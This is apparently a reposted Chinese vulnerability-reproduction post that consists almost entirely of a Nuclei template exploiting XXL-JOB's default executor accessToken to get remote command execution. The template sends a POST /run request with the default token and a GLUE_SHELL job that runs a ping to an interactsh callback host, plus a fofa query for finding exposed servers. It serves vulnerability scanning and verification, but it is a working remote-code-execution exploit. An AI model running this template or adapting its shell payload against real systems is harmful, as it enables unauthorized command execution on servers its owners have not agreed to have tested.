nuclei脚本:
id
: xxl-job-executor-default-accessToken-RCE
info:
name: xxl-job-executor-
default
-accessToken-RCE
author: known
severity: high
description: XXL-JOB 默认 accessToken 身份绕过,可导致 RCE
metadata:
max-request:
1
verified:
true
fofa-query: app=
"XXL-JOB"
tags: xxl-job,rce
variables:
filename:
"{{to_lower(rand_base(10))}}"
servicename:
"{{to_lower(rand_base(20))}}"
randjobid:
"{{rand_int(999,999999)}}"
datetime:
'{{date_time("%Y-%M-%D %H:%m:%s")}}'
unix_time:
'{{date_time("{{datetime}}",unix_time())}}'
http:
- raw:
- |
:
25
s
POST /run HTTP/
1.1
Host: {{Host}}:
9999
XXL-JOB-ACCESS-TOKEN: default_token
Content-Type: application/json
{
"jobId"
: {{randjobid}},
"executorHandler"
:
"demoJobHandler"
,
"executorParams"
:
"demoJobHandler"
,
"executorBlockStrategy"
:
"COVER_EARLY"
,
"executorTimeout"
:
0
,
"logId"
: {{randjobid}},
"logDateTime"
: {{unix_time}},
"glueType"
:
"GLUE_SHELL"
,
"glueSource"
:
"ping {{Host}}.{{randjobid}}.{{interactsh-url}}"
,
"glueUpdatetime"
: {{unix_time}},
"broadcastIndex"
:
0
,
"broadcastTotal"
:
0
}
req-condition:
true
matchers-condition: and
matchers:
-
type
: word
part: interactsh_protocol
words:
-
"dns"
原文始发于微信公众号(扫地僧的茶饭日常):【漏洞复现】XXL-JOB 默认 accessToken 身份绕过漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论